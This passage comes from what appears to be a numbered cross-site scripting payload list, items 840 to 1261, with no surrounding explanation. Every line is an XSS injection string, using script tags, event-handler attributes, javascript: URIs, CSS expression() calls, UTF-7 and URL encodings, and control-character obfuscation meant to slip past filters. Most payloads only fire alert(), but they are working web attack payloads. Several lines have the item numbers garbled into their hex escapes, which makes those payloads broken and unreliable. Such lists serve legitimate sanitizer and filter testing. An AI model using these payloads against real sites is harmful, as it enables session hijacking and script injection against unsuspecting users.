  840. <style><img src="</style><img src=x onerror=alert(962)//">
  841. <embed src="javascript:alert(963)">
  842. <? foo="><script>alert(964)</script>">
  843. <! foo="><script>alert(965)</script>">
  844. </ foo="><script>alert(966)</script>">
  845. <script>ReferenceError.prototype.__defineGetter__('name', function(){alert(967)}),x</script>
  846. <script>Object.__noSuchMethod__ = Function,[{}][0].constructor._('alert(968)')()</script>
  847. <script src="#">{alert(969)}</script>;969
  848. <script>crypto.generateCRMFRequest('CN=0',0,0,null,'alert(970)',384,null,'rsa-dual-use')</script>
  849. <svg xmlns="#"><script>alert(971)</script></svg>
  850. <svg onload="javascript:alert(972)" xmlns="#"></svg>
  851. <iframe xmlns="#" src="javascript:alert(973)"></iframe>
  852. +ADw-script+AD4-alert(974)+ADw-/script+AD4-
  853. %2BADw-script+AD4-alert(975)%2BADw-/script%2BAD4-
  854. +ACIAPgA8-script+AD4-alert(976)+ADw-/script+AD4APAAi-
  855. %253cscript%253ealert(977)%253c/script%253e
  856. “><s”%2b”cript>alert(978)</script>
  857. “><ScRiPt>alert(979)</script>
  858. “><<script>alert(980);//<</script>
  859. foo<script>alert(981)</script>
  860. <scr<script>ipt>alert(982)</scr</script>ipt>
  861. ‘; alert(983); var foo=’
  862. foo\’; alert(984);//’;
  863. </script><script >alert(985)</script>
  864. <img src=asdf onerror=alert(986)>
  865. <BODY ONLOAD=alert(987)>
  866. <script>alert(988)</script>
  867. "><script>alert(989))</script>
  868. <video src=990 onerror=alert(990)>
  869. <audio src=991 onerror=alert(991)>
  870. ';alert(992))//';alert(992))//";alert(992))//";alert(992))//--></SCRIPT>">'><SCRIPT>alert(992))</SCRIPT>
  871. 0\"autofocus/onfocus=alert(993)--><video/poster/onerror=prompt(2)>"-confirm(3)-"
  872. <IMG SRC="javascript:alert(994);">
  873. <IMG SRC=javascript:alert(995)>
  874. <IMG SRC=JaVaScRiPt:alert(996)>
  875. <IMG SRC=javascript:alert(997)>
  876. <IMG SRC=`javascript:alert(998)`>
  877. <a onmouseover="alert(999)">xxs link</a>
  878. <a onmouseover=alert(1000)>xxs link</a>
  879. <IMG """><SCRIPT>alert(1001)</SCRIPT>">
  880. <IMG SRC=javascript:alert(1002))>
  881. <IMG SRC=# onmouseover="alert(1003)">
  882. <IMG SRC= onmouseover="alert(1004)">
  883. <IMG onmouseover="alert(1005)">
  884. <IMG SRC=/ onerror="alert(1006))"></img>
  885. <IMG SRC="jav ascript:alert(1007);">
  886. <IMG SRC="jav&#x09;ascript:alert(1008);">
  887. <IMG SRC="jav&#x0A;ascript:alert(1009);">
  888. <IMG SRC="jav&#x0D;ascript:alert(1010);">
  889. <IMG SRC=" &#14; javascript:alert(1011);">
  890. <BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert(1012)>
  891. <<SCRIPT>alert(1013);//<</SCRIPT>
  892. <IMG SRC="javascript:alert(1014)"
  893. \";alert(1015);//
  894. </script><script>alert(1016);</script>
  895. </TITLE><SCRIPT>alert(1017);</SCRIPT>
  896. <INPUT TYPE="IMAGE" SRC="javascript:alert(1018);">
  897. <BODY BACKGROUND="javascript:alert(1019)">
  898. <IMG DYNSRC="javascript:alert(1020)">
  899. <IMG LOWSRC="javascript:alert(1021)">
  900. <STYLE>li {list-style-image: url("javascript:alert(1022)");}</STYLE><UL><LI>XSS</br>
  901. <BODY ONLOAD=alert(1023)>
  902. <BGSOUND SRC="javascript:alert(1024);">
  903. <BR SIZE="&{alert(1025)}">
  904. <LINK REL="stylesheet" HREF="javascript:alert(1026);">
  905. <STYLE>@im\port'\ja\vasc\ript:alert(1027)';</STYLE>
  906. <IMG STYLE="xss:expr/*XSS*/ession(alert(1028))">
  907. xss:ex/*XSS*//*/*/pression(alert(1029))'>
  908. <STYLE TYPE="text/javascript">alert(1030);</STYLE>
  909. <STYLE>.XSS{background-image:url("javascript:alert(1031)");}</STYLE><A CLASS=XSS></A>
  910. <STYLE type="text/css">BODY{background:url("javascript:alert(1032)")}</STYLE>
  911. <XSS STYLE="xss:expression(alert(1033))">
  912. ¼script¾alert(1034)¼/script¾
  913. <META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert(1035);">
  914. <META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:alert(1036);">
  915. <IFRAME SRC="javascript:alert(1037);"></IFRAME>
  916. <IFRAME SRC=# onmouseover="alert(1038)"></IFRAME>
  917. <FRAMESET><FRAME SRC="javascript:alert(1039);"></FRAMESET>
  918. <TABLE BACKGROUND="javascript:alert(1040)">
  919. <TABLE><TD BACKGROUND="javascript:alert(1041)">
  920. <DIV STYLE="background-image: url(javascript:alert(1042))">
  921. <DIV STYLE="background-image: url(&#1;javascript:alert(1043))">
  922. <DIV STYLE="width: expression(alert(1044));">
  923. <!--[if gte IE 4]><SCRIPT>alert(1045);</SCRIPT><![endif]-->
  924. <BASE HREF="javascript:alert(1046);//">
  925. <? echo('<SCR)';echo('IPT>alert(1047)</SCRIPT>'); ?>
  926. <META HTTP-EQUIV="Set-Cookie" Content="USERID=<SCRIPT>alert(1048)</SCRIPT>">
  927. <HEAD><META HTTP-EQUIV="CONTENT-TYPE" CONTENT="text/html; charset=UTF-7"> </HEAD>+ADw-SCRIPT+AD4-alert(1049);+ADw-/SCRIPT+AD4-
  928. 0\"autofocus/onfocus=alert(1050)--><video/poster/ error=prompt(2)>"-confirm(3)-"
  929. veris-->group<svg/onload=alert(1051)//
  930. #"><img src=M onerror=alert(1052);>
  931. element[attribute='<img src=x onerror=alert(1053);>
  932. [<blockquote cite="]">[" onmouseover="alert(1054);" ]
  933. <scr<script>ipt>alert(1055)</scr</script>ipt><scr<script>ipt>alert(1055)</scr</script>ipt>
  934. <sCR<script>iPt>alert(1056)</SCr</script>IPt>
  935. %253Cscript%253Ealert(1057)%253C%252Fscript%253E
  936. <IMG SRC=x onload="alert(1058))">
  937. <IMG SRC=x onafterprint="alert(1059))">
  938. <IMG SRC=x onbeforeprint="alert(1060))">
  939. <IMG SRC=x onbeforeunload="alert(1061))">
  940. <IMG SRC=x onerror="alert(1062))">
  941. <IMG SRC=x onhashchange="alert(1063))">
  942. <IMG SRC=x onload="alert(1064))">
  943. <IMG SRC=x onmessage="alert(1065))">
  944. <IMG SRC=x ononline="alert(1066))">
  945. <IMG SRC=x onoffline="alert(1067))">
  946. <IMG SRC=x onpagehide="alert(1068))">
  947. <IMG SRC=x onpageshow="alert(1069))">
  948. <IMG SRC=x onpopstate="alert(1070))">
  949. <IMG SRC=x onresize="alert(1071))">
  950. <IMG SRC=x onstorage="alert(1072))">
  951. <IMG SRC=x onunload="alert(1073))">
  952. <IMG SRC=x onblur="alert(1074))">
  953. <IMG SRC=x onchange="alert(1075))">
  954. <IMG SRC=x oncontextmenu="alert(1076))">
  955. <IMG SRC=x oninput="alert(1077))">
  956. <IMG SRC=x oninvalid="alert(1078))">
  957. <IMG SRC=x onreset="alert(1079))">
  958. <IMG SRC=x onsearch="alert(1080))">
  959. <IMG SRC=x onselect="alert(1081))">
  960. <IMG SRC=x onsubmit="alert(1082))">
  961. <IMG SRC=x onkeydown="alert(1083))">
  962. <IMG SRC=x onkeypress="alert(1084))">
  963. <IMG SRC=x onkeyup="alert(1085))">
  964. <IMG SRC=x onclick="alert(1086))">
  965. <IMG SRC=x ondblclick="alert(1087))">
  966. <IMG SRC=x onmousedown="alert(1088))">
  967. <IMG SRC=x onmousemove="alert(1089))">
  968. <IMG SRC=x onmouseout="alert(1090))">
  969. <IMG SRC=x onmouseover="alert(1091))">
  970. <IMG SRC=x onmouseup="alert(1092))">
  971. <IMG SRC=x onmousewheel="alert(1093))">
  972. <IMG SRC=x onwheel="alert(1094))">
  973. <IMG SRC=x ondrag="alert(1095))">
  974. <IMG SRC=x ondragend="alert(1096))">
  975. <IMG SRC=x ondragenter="alert(1097))">
  976. <IMG SRC=x ondragleave="alert(1098))">
  977. <IMG SRC=x ondragover="alert(1099))">
  978. <IMG SRC=x ondragstart="alert(1100))">
  979. <IMG SRC=x ondrop="alert(1101))">
  980. <IMG SRC=x onscroll="alert(1102))">
  981. <IMG SRC=x oncopy="alert(1103))">
  982. <IMG SRC=x oncut="alert(1104))">
  983. <IMG SRC=x onpaste="alert(1105))">
  984. <IMG SRC=x onabort="alert(1106))">
  985. <IMG SRC=x oncanplay="alert(1107))">
  986. <IMG SRC=x oncanplaythrough="alert(1108))">
  987. <IMG SRC=x oncuechange="alert(1109))">
  988. <IMG SRC=x ondurationchange="alert(1110))">
  989. <IMG SRC=x onemptied="alert(1111))">
  990. <IMG SRC=x onended="alert(1112))">
  991. <IMG SRC=x onerror="alert(1113))">
  992. <IMG SRC=x onloadeddata="alert(1114))">
  993. <IMG SRC=x onloadedmetadata="alert(1115))">
  994. <IMG SRC=x onloadstart="alert(1116))">
  995. <IMG SRC=x onpause="alert(1117))">
  996. <IMG SRC=x onplay="alert(1118))">
  997. <IMG SRC=x onplaying="alert(1119))">
  998. <IMG SRC=x onprogress="alert(1120))">
  999. <IMG SRC=x onratechange="alert(1121))">
  1000. <IMG SRC=x onseeked="alert(1122))">
  1001. <IMG SRC=x onseeking="alert(1123))">
  1002. <IMG SRC=x onstalled="alert(1124))">
  1003. <IMG SRC=x onsuspend="alert(1125))">
  1004. <IMG SRC=x ontimeupdate="alert(1126))">
  1005. <IMG SRC=x onvolumechange="alert(1127))">
  1006. <IMG SRC=x onwaiting="alert(1128))">
  1007. <IMG SRC=x onshow="alert(1129))">
  1008. <IMG SRC=x ontoggle="alert(1130))">
  1009. <META onpaonpageonpagonpageonpageshowshoweshowshowgeshow="alert(1131)";
  1010. <IMG SRC=x onload="alert(1132))">
  1011. <INPUT TYPE="BUTTON" action="alert(1133)"/>
  1012. "><h1><IFRAME SRC="javascript:alert(1134);"></IFRAME>">123</h1>
  1013. "><h1><IFRAME SRC=# onmouseover="alert(1135)"></IFRAME>123</h1>
  1014. <IFRAME SRC="javascript:alert(1136);"></IFRAME>
  1015. <IFRAME SRC=# onmouseover="alert(1137)"></IFRAME>
  1016. "><h1><IFRAME SRC=# onmouseover="alert(1138)"></IFRAME>123</h1>
  1017. "></iframe><script>alert(1139);</script><iframe frameborder="0%EF%BB%BF
  1018. "><h1><IFRAME width="420" height="315" SRC="http://www.youtube.com/embed/sxvccpasgTE" frameborder="0" onmouseover="alert(1140)"></IFRAME>123</h1>
  1019. <IFRAME width="420" height="315" frameborder="0" onload="alert(1141)"></IFRAME>
  1020. "><h1><IFRAME SRC="javascript:alert(1142);"></IFRAME>">123</h1>
  1021. "><h1><IFRAME SRC=# onmouseover="alert(1143)"></IFRAME>123</h1>
  1022. <IFRAME SRC="javascript:alert(1144);"></IFRAME>
  1023. <IFRAME SRC=# onmouseover="alert(1145)"></IFRAME>
  1024. <img src=``&NewLine; onerror=alert(1146)&NewLine;
  1025. <script /**/>/**/alert(1147)/**/</script /**/
  1026. <iframe/src="data:text/html,<svg &#114811481148;&#114811480;load=alert(1148)>">
  1027. <meta content="&NewLine; 1149 &NewLine;; JAVASCRIPT&colon; alert(1149)" http-equiv="refresh"/>
  1028. <form><iframe &#09;&#11500;&#11501150; src="javascript&#58;alert(1150)"&#11501150;&#11500;&#09;;>
  1029. http://www.google<script .com>alert(1151)</script
  1030. <script ^__^>alert(1152))</script ^__^
  1031. </style &#32;><script &#32; :-(>/**/alert(1153)/**/</script &#32; :-(
  1032. &#00;</form><input type&#61154;"date" onfocus="alert(1154)">
  1033. <a href="javascript:void(0)" onmouseover=&NewLine;javascript:alert(1155)&NewLine;>X</a>
  1034. <script ~~~>alert(1156)</script ~~~>
  1035. <iframe// src=javaSCRIPT&colon;alert(1157)
  1036. <%<!--'%><script>alert(1158);</script -->
  1037. <script src="data:text/javascript,alert(1159)"></script>
  1038. <iframe/onreadystatechange=alert(1160)
  1039. <svg/onload=alert(1161)
  1040. <input type="text" value=`` <div/onmouseover='alert(1162)'>X</div>
  1041. http://www.<script>alert(1163)</script .com
  1042. <svg><script ?>alert(1164)
  1043. <img src=`xx:xx`onerror=alert(1165)>
  1044. <meta http-equiv="refresh" content="0;javascript&colon;alert(1166)"/>
  1045. <script>+-+-1167-+-+alert(1167)</script>
  1046. <body/onload=&lt;!--&gt;&#11680alert(1168)>
  1047. <script itworksinallbrowsers>/*<script* */alert(1169)</script
  1048. <img src ?itworksonchrome?\/onerror = alert(1170)
  1049. <svg><script onlypossibleinopera:-)> alert(1171)
  1050. <script x> alert(1172) </script 1172=2
  1051. <div/onmouseover='alert(1173)'> style="x:">
  1052. <--`<img/src=` onerror=alert(1174)> --!>
  1053. <div style="position:absolute;top:0;left:0;width:117500%;height:117500%" onmouseover="prompt(1175)" onclick="alert(1175)">x</button>
  1054. <form><button formaction=javascript&colon;alert(1176)>CLICKME
  1055. <script\x20type="text/javascript">javascript:alert(1177);</script>
  1056. <script\x3Etype="text/javascript">javascript:alert(1178);</script>
  1057. <script\x0Dtype="text/javascript">javascript:alert(1179);</script>
  1058. <script\x09type="text/javascript">javascript:alert(1180);</script>
  1059. <script\x0Ctype="text/javascript">javascript:alert(1181);</script>
  1060. <script\x2Ftype="text/javascript">javascript:alert(1182);</script>
  1061. <script\x0Atype="text/javascript">javascript:alert(1183);</script>
  1062. '`"><\x3Cscript>javascript:alert(1184)</script>
  1063. '`"><\x00script>javascript:alert(1185)</script>
  1064. <img src=1186 href=1186 onerror="javascript:alert(1186)"></img>
  1065. <audio src=1187 href=1187 onerror="javascript:alert(1187)"></audio>
  1066. <video src=1188 href=1188 onerror="javascript:alert(1188)"></video>
  1067. <body src=1189 href=1189 onerror="javascript:alert(1189)"></body>
  1068. <image src=1190 href=1190 onerror="javascript:alert(1190)"></image>
  1069. <object src=1191 href=1191 onerror="javascript:alert(1191)"></object>
  1070. <script src=1192 href=1192 onerror="javascript:alert(1192)"></script>
  1071. <svg onResize svg onResize="javascript:javascript:alert(1193)"></svg onResize>
  1072. <title onPropertyChange title onPropertyChange="javascript:javascript:alert(1194)"></title onPropertyChange>
  1073. <iframe onLoad iframe onLoad="javascript:javascript:alert(1195)"></iframe onLoad>
  1074. <body onMouseEnter body onMouseEnter="javascript:javascript:alert(1196)"></body onMouseEnter>
  1075. <body onFocus body onFocus="javascript:javascript:alert(1197)"></body onFocus>
  1076. <frameset onScroll frameset onScroll="javascript:javascript:alert(1198)"></frameset onScroll>
  1077. <script onReadyStateChange script onReadyStateChange="javascript:javascript:alert(1199)"></script onReadyStateChange>
  1078. <html onMouseUp html onMouseUp="javascript:javascript:alert(1200)"></html onMouseUp>
  1079. <body onPropertyChange body onPropertyChange="javascript:javascript:alert(1201)"></body onPropertyChange>
  1080. <svg onLoad svg onLoad="javascript:javascript:alert(1202)"></svg onLoad>
  1081. <body onPageHide body onPageHide="javascript:javascript:alert(1203)"></body onPageHide>
  1082. <body onMouseOver body onMouseOver="javascript:javascript:alert(1204)"></body onMouseOver>
  1083. <body onUnload body onUnload="javascript:javascript:alert(1205)"></body onUnload>
  1084. <body onLoad body onLoad="javascript:javascript:alert(1206)"></body onLoad>
  1085. <bgsound onPropertyChange bgsound onPropertyChange="javascript:javascript:alert(1207)"></bgsound onPropertyChange>
  1086. <html onMouseLeave html onMouseLeave="javascript:javascript:alert(1208)"></html onMouseLeave>
  1087. <html onMouseWheel html onMouseWheel="javascript:javascript:alert(1209)"></html onMouseWheel>
  1088. <style onLoad style onLoad="javascript:javascript:alert(1210)"></style onLoad>
  1089. <iframe onReadyStateChange iframe onReadyStateChange="javascript:javascript:alert(1211)"></iframe onReadyStateChange>
  1090. <body onPageShow body onPageShow="javascript:javascript:alert(1212)"></body onPageShow>
  1091. <style onReadyStateChange style onReadyStateChange="javascript:javascript:alert(1213)"></style onReadyStateChange>
  1092. <frameset onFocus frameset onFocus="javascript:javascript:alert(1214)"></frameset onFocus>
  1093. <applet onError applet onError="javascript:javascript:alert(1215)"></applet onError>
  1094. <marquee onStart marquee onStart="javascript:javascript:alert(1216)"></marquee onStart>
  1095. <script onLoad script onLoad="javascript:javascript:alert(1217)"></script onLoad>
  1096. <html onMouseOver html onMouseOver="javascript:javascript:alert(1218)"></html onMouseOver>
  1097. <html onMouseEnter html onMouseEnter="javascript:parent.javascript:alert(1219)"></html onMouseEnter>
  1098. <body onBeforeUnload body onBeforeUnload="javascript:javascript:alert(1220)"></body onBeforeUnload>
  1099. <html onMouseDown html onMouseDown="javascript:javascript:alert(1221)"></html onMouseDown>
  1100. <marquee onScroll marquee onScroll="javascript:javascript:alert(1222)"></marquee onScroll>
  1101. <xml onPropertyChange xml onPropertyChange="javascript:javascript:alert(1223)"></xml onPropertyChange>
  1102. <frameset onBlur frameset onBlur="javascript:javascript:alert(1224)"></frameset onBlur>
  1103. <applet onReadyStateChange applet onReadyStateChange="javascript:javascript:alert(1225)"></applet onReadyStateChange>
  1104. <svg onUnload svg onUnload="javascript:javascript:alert(1226)"></svg onUnload>
  1105. <html onMouseOut html onMouseOut="javascript:javascript:alert(1227)"></html onMouseOut>
  1106. <body onMouseMove body onMouseMove="javascript:javascript:alert(1228)"></body onMouseMove>
  1107. <body onResize body onResize="javascript:javascript:alert(1229)"></body onResize>
  1108. <object onError object onError="javascript:javascript:alert(1230)"></object onError>
  1109. <body onPopState body onPopState="javascript:javascript:alert(1231)"></body onPopState>
  1110. <html onMouseMove html onMouseMove="javascript:javascript:alert(1232)"></html onMouseMove>
  1111. <applet onreadystatechange applet onreadystatechange="javascript:javascript:alert(1233)"></applet onreadystatechange>
  1112. <body onpagehide body onpagehide="javascript:javascript:alert(1234)"></body onpagehide>
  1113. <svg onunload svg onunload="javascript:javascript:alert(1235)"></svg onunload>
  1114. <applet onerror applet onerror="javascript:javascript:alert(1236)"></applet onerror>
  1115. <body onkeyup body onkeyup="javascript:javascript:alert(1237)"></body onkeyup>
  1116. <body onunload body onunload="javascript:javascript:alert(1238)"></body onunload>
  1117. <iframe onload iframe onload="javascript:javascript:alert(1239)"></iframe onload>
  1118. <body onload body onload="javascript:javascript:alert(1240)"></body onload>
  1119. <html onmouseover html onmouseover="javascript:javascript:alert(1241)"></html onmouseover>
  1120. <object onbeforeload object onbeforeload="javascript:javascript:alert(1242)"></object onbeforeload>
  1121. <body onbeforeunload body onbeforeunload="javascript:javascript:alert(1243)"></body onbeforeunload>
  1122. <body onfocus body onfocus="javascript:javascript:alert(1244)"></body onfocus>
  1123. <body onkeydown body onkeydown="javascript:javascript:alert(1245)"></body onkeydown>
  1124. <iframe onbeforeload iframe onbeforeload="javascript:javascript:alert(1246)"></iframe onbeforeload>
  1125. <iframe src iframe src="javascript:javascript:alert(1247)"></iframe src>
  1126. <svg onload svg onload="javascript:javascript:alert(1248)"></svg onload>
  1127. <html onmousemove html onmousemove="javascript:javascript:alert(1249)"></html onmousemove>
  1128. <body onblur body onblur="javascript:javascript:alert(1250)"></body onblur>
  1129. \x3Cscript>javascript:alert(1251)</script>
  1130. '"`><script>/* *\x2Fjavascript:alert(1252)// */</script>
  1131. <script>javascript:alert(1253)</script\x0D
  1132. <script>javascript:alert(1254)</script\x0A
  1133. <script>javascript:alert(1255)</script\x0B
  1134. <script charset="\x22>javascript:alert(1256)</script>
  1135. <!--\x3E<img src=xxx:x onerror=javascript:alert(1257)> -->
  1136. --><!-- ---> <img src=xxx:x onerror=javascript:alert(1258)> -->
  1137. --><!-- --\x00> <img src=xxx:x onerror=javascript:alert(1259)> -->
  1138. --><!-- --\x21260> <img src=xxx:x onerror=javascript:alert(1260)> -->
  1139. --><!-- --\x3E> <img src=xxx:x onerror=javascript:alert(1261)> -->
  1140. `"'><img src='#\x27 onerror=javascript:alert(1262)>
  1141. <a href="javascript\x3Ajavascript:alert(1263)" id="fuzzelement1263">test</a>
  1142. "'`><p><svg><script>a='hello\x27;javascript:alert(1264)//';</script></p>
  1143. <a href="javas\x00cript:javascript:alert(1265)" id="fuzzelement1265">test</a>
  1144. <a href="javas\x07cript:javascript:alert(1266)" id="fuzzelement1266">test</a>
  1145. <a href="javas\x0Dcript:javascript:alert(1267)" id="fuzzelement1267">test</a>
  1146. <a href="javas\x0Acript:javascript:alert(1268)" id="fuzzelement1268">test</a>
  1147. <a href="javas\x08cript:javascript:alert(1269)" id="fuzzelement1269">test</a>
  1148. <a href="javas\x02cript:javascript:alert(1270)" id="fuzzelement1270">test</a>
  1149. <a href="javas\x03cript:javascript:alert(1271)" id="fuzzelement1271">test</a>
  1150. <a href="javas\x04cript:javascript:alert(1272)" id="fuzzelement1272">test</a>
  1151. <a href="javas\x01273cript:javascript:alert(1273)" id="fuzzelement1273">test</a>
  1152. <a href="javas\x05cript:javascript:alert(1274)" id="fuzzelement1274">test</a>
  1153. <a href="javas\x0Bcript:javascript:alert(1275)" id="fuzzelement1275">test</a>
  1154. <a href="javas\x09cript:javascript:alert(1276)" id="fuzzelement1276">test</a>
  1155. <a href="javas\x06cript:javascript:alert(1277)" id="fuzzelement1277">test</a>
  1156. <a href="javas\x0Ccript:javascript:alert(1278)" id="fuzzelement1278">test</a>
  1157. <script>/* *\x2A/javascript:alert(1279)// */</script>
  1158. <script>/* *\x00/javascript:alert(1280)// */</script>
  1159. <style></style\x3E<img src="about:blank" onerror=javascript:alert(1281)//></style>
  1160. <style></style\x0D<img src="about:blank" onerror=javascript:alert(1282)//></style>
  1161. <style></style\x09<img src="about:blank" onerror=javascript:alert(1283)//></style>
  1162. <style></style\x20<img src="about:blank" onerror=javascript:alert(1284)//></style>
  1163. <style></style\x0A<img src="about:blank" onerror=javascript:alert(1285)//></style>
  1164. "'`>ABC<div style="font-family:'foo'\x7Dx:expression(javascript:alert(1286);/*';">DEF
  1165. "'`>ABC<div style="font-family:'foo'\x3Bx:expression(javascript:alert(1287);/*';">DEF
  1166. <script>if("x\\xE1288\x96\x89".length==2) { javascript:alert(1288);}</script>
  1167. <script>if("x\\xE0\xB9\x92".length==2) { javascript:alert(1289);}</script>
  1168. <script>if("x\\xEE\xA9\x93".length==2) { javascript:alert(1290);}</script>
  1169. '`"><\x3Cscript>javascript:alert(1291)</script>
  1170. '`"><\x00script>javascript:alert(1292)</script>
  1171. "'`><\x3Cimg src=xxx:x onerror=javascript:alert(1293)>
  1172. "'`><\x00img src=xxx:x onerror=javascript:alert(1294)>
  1173. <script src="data:text/plain\x2Cjavascript:alert(1295)"></script>
  1174. <script src="data:\xD4\x8F,javascript:alert(1296)"></script>
  1175. <script src="data:\xE0\xA4\x98,javascript:alert(1297)"></script>
  1176. <script src="data:\xCB\x8F,javascript:alert(1298)"></script>
  1177. <script\x20type="text/javascript">javascript:alert(1299);</script>
  1178. <script\x3Etype="text/javascript">javascript:alert(1300);</script>
  1179. <script\x0Dtype="text/javascript">javascript:alert(1301);</script>
  1180. <script\x09type="text/javascript">javascript:alert(1302);</script>
  1181. <script\x0Ctype="text/javascript">javascript:alert(1303);</script>
  1182. <script\x2Ftype="text/javascript">javascript:alert(1304);</script>
  1183. <script\x0Atype="text/javascript">javascript:alert(1305);</script>
  1184. ABC<div style="x\x3Aexpression(javascript:alert(1306)">DEF
  1185. ABC<div style="x:expression\x5C(javascript:alert(1307)">DEF
  1186. ABC<div style="x:expression\x00(javascript:alert(1308)">DEF
  1187. ABC<div style="x:exp\x00ression(javascript:alert(1309)">DEF
  1188. ABC<div style="x:exp\x5Cression(javascript:alert(1310)">DEF
  1189. ABC<div style="x:\x0Aexpression(javascript:alert(1311)">DEF
  1190. ABC<div style="x:\x09expression(javascript:alert(1312)">DEF
  1191. ABC<div style="x:\xE3\x80\x80expression(javascript:alert(1313)">DEF
  1192. ABC<div style="x:\xE2\x80\x84expression(javascript:alert(1314)">DEF
  1193. ABC<div style="x:\xC2\xA0expression(javascript:alert(1315)">DEF
  1194. ABC<div style="x:\xE2\x80\x80expression(javascript:alert(1316)">DEF
  1195. ABC<div style="x:\xE2\x80\x8Aexpression(javascript:alert(1317)">DEF
  1196. ABC<div style="x:\x0Dexpression(javascript:alert(1318)">DEF
  1197. ABC<div style="x:\x0Cexpression(javascript:alert(1319)">DEF
  1198. ABC<div style="x:\xE2\x80\x87expression(javascript:alert(1320)">DEF
  1199. ABC<div style="x:\xEF\xBB\xBFexpression(javascript:alert(1321)">DEF
  1200. ABC<div style="x:\x20expression(javascript:alert(1322)">DEF
  1201. ABC<div style="x:\xE2\x80\x88expression(javascript:alert(1323)">DEF
  1202. ABC<div style="x:\x00expression(javascript:alert(1324)">DEF
  1203. ABC<div style="x:\xE2\x80\x8Bexpression(javascript:alert(1325)">DEF
  1204. ABC<div style="x:\xE2\x80\x86expression(javascript:alert(1326)">DEF
  1205. ABC<div style="x:\xE2\x80\x85expression(javascript:alert(1327)">DEF
  1206. ABC<div style="x:\xE2\x80\x82expression(javascript:alert(1328)">DEF
  1207. ABC<div style="x:\x0Bexpression(javascript:alert(1329)">DEF
  1208. ABC<div style="x:\xE2\x80\x81330expression(javascript:alert(1330)">DEF
  1209. ABC<div style="x:\xE2\x80\x83expression(javascript:alert(1331)">DEF
  1210. ABC<div style="x:\xE2\x80\x89expression(javascript:alert(1332)">DEF
  1211. <a href="\x0Bjavascript:javascript:alert(1333)" id="fuzzelement1333">test</a>
  1212. <a href="\x0Fjavascript:javascript:alert(1334)" id="fuzzelement1334">test</a>
  1213. <a href="\xC2\xA0javascript:javascript:alert(1335)" id="fuzzelement1335">test</a>
  1214. <a href="\x05javascript:javascript:alert(1336)" id="fuzzelement1336">test</a>
  1215. <a href="\xE1337\xA0\x8Ejavascript:javascript:alert(1337)" id="fuzzelement1337">test</a>
  1216. <a href="\x13388javascript:javascript:alert(1338)" id="fuzzelement1338">test</a>
  1217. <a href="\x13391339javascript:javascript:alert(1339)" id="fuzzelement1339">test</a>
  1218. <a href="\xE2\x80\x88javascript:javascript:alert(1340)" id="fuzzelement1340">test</a>
  1219. <a href="\xE2\x80\x89javascript:javascript:alert(1341)" id="fuzzelement1341">test</a>
  1220. <a href="\xE2\x80\x80javascript:javascript:alert(1342)" id="fuzzelement1342">test</a>
  1221. <a href="\x13437javascript:javascript:alert(1343)" id="fuzzelement1343">test</a>
  1222. <a href="\x03javascript:javascript:alert(1344)" id="fuzzelement1344">test</a>
  1223. <a href="\x0Ejavascript:javascript:alert(1345)" id="fuzzelement1345">test</a>
  1224. <a href="\x1346Ajavascript:javascript:alert(1346)" id="fuzzelement1346">test</a>
  1225. <a href="\x00javascript:javascript:alert(1347)" id="fuzzelement1347">test</a>
  1226. <a href="\x13480javascript:javascript:alert(1348)" id="fuzzelement1348">test</a>
  1227. <a href="\xE2\x80\x82javascript:javascript:alert(1349)" id="fuzzelement1349">test</a>
  1228. <a href="\x20javascript:javascript:alert(1350)" id="fuzzelement1350">test</a>
  1229. <a href="\x13513javascript:javascript:alert(1351)" id="fuzzelement1351">test</a>
  1230. <a href="\x09javascript:javascript:alert(1352)" id="fuzzelement1352">test</a>
  1231. <a href="\xE2\x80\x8Ajavascript:javascript:alert(1353)" id="fuzzelement1353">test</a>
  1232. <a href="\x13544javascript:javascript:alert(1354)" id="fuzzelement1354">test</a>
  1233. <a href="\x13559javascript:javascript:alert(1355)" id="fuzzelement1355">test</a>
  1234. <a href="\xE2\x80\xAFjavascript:javascript:alert(1356)" id="fuzzelement1356">test</a>
  1235. <a href="\x1357Fjavascript:javascript:alert(1357)" id="fuzzelement1357">test</a>
  1236. <a href="\xE2\x80\x81358javascript:javascript:alert(1358)" id="fuzzelement1358">test</a>
  1237. <a href="\x1359Djavascript:javascript:alert(1359)" id="fuzzelement1359">test</a>
  1238. <a href="\xE2\x80\x87javascript:javascript:alert(1360)" id="fuzzelement1360">test</a>
  1239. <a href="\x07javascript:javascript:alert(1361)" id="fuzzelement1361">test</a>
  1240. <a href="\xE1362\x9A\x80javascript:javascript:alert(1362)" id="fuzzelement1362">test</a>
  1241. <a href="\xE2\x80\x83javascript:javascript:alert(1363)" id="fuzzelement1363">test</a>
  1242. <a href="\x04javascript:javascript:alert(1364)" id="fuzzelement1364">test</a>
  1243. <a href="\x01365javascript:javascript:alert(1365)" id="fuzzelement1365">test</a>
  1244. <a href="\x08javascript:javascript:alert(1366)" id="fuzzelement1366">test</a>
  1245. <a href="\xE2\x80\x84javascript:javascript:alert(1367)" id="fuzzelement1367">test</a>
  1246. <a href="\xE2\x80\x86javascript:javascript:alert(1368)" id="fuzzelement1368">test</a>
  1247. <a href="\xE3\x80\x80javascript:javascript:alert(1369)" id="fuzzelement1369">test</a>
  1248. <a href="\x13702javascript:javascript:alert(1370)" id="fuzzelement1370">test</a>
  1249. <a href="\x0Djavascript:javascript:alert(1371)" id="fuzzelement1371">test</a>
  1250. <a href="\x0Ajavascript:javascript:alert(1372)" id="fuzzelement1372">test</a>
  1251. <a href="\x0Cjavascript:javascript:alert(1373)" id="fuzzelement1373">test</a>
  1252. <a href="\x13745javascript:javascript:alert(1374)" id="fuzzelement1374">test</a>
  1253. <a href="\xE2\x80\xA8javascript:javascript:alert(1375)" id="fuzzelement1375">test</a>
  1254. <a href="\x13766javascript:javascript:alert(1376)" id="fuzzelement1376">test</a>
  1255. <a href="\x02javascript:javascript:alert(1377)" id="fuzzelement1377">test</a>
  1256. <a href="\x1378Bjavascript:javascript:alert(1378)" id="fuzzelement1378">test</a>
  1257. <a href="\x06javascript:javascript:alert(1379)" id="fuzzelement1379">test</a>
  1258. <a href="\xE2\x80\xA9javascript:javascript:alert(1380)" id="fuzzelement1380">test</a>
  1259. <a href="\xE2\x80\x85javascript:javascript:alert(1381)" id="fuzzelement1381">test</a>
  1260. <a href="\x1382Ejavascript:javascript:alert(1382)" id="fuzzelement1382">test</a>
  1261. <a href="\xE2\x81383\x9Fjavascript:javascript:alert(1383)" id="fuzzelement1383">test</a>
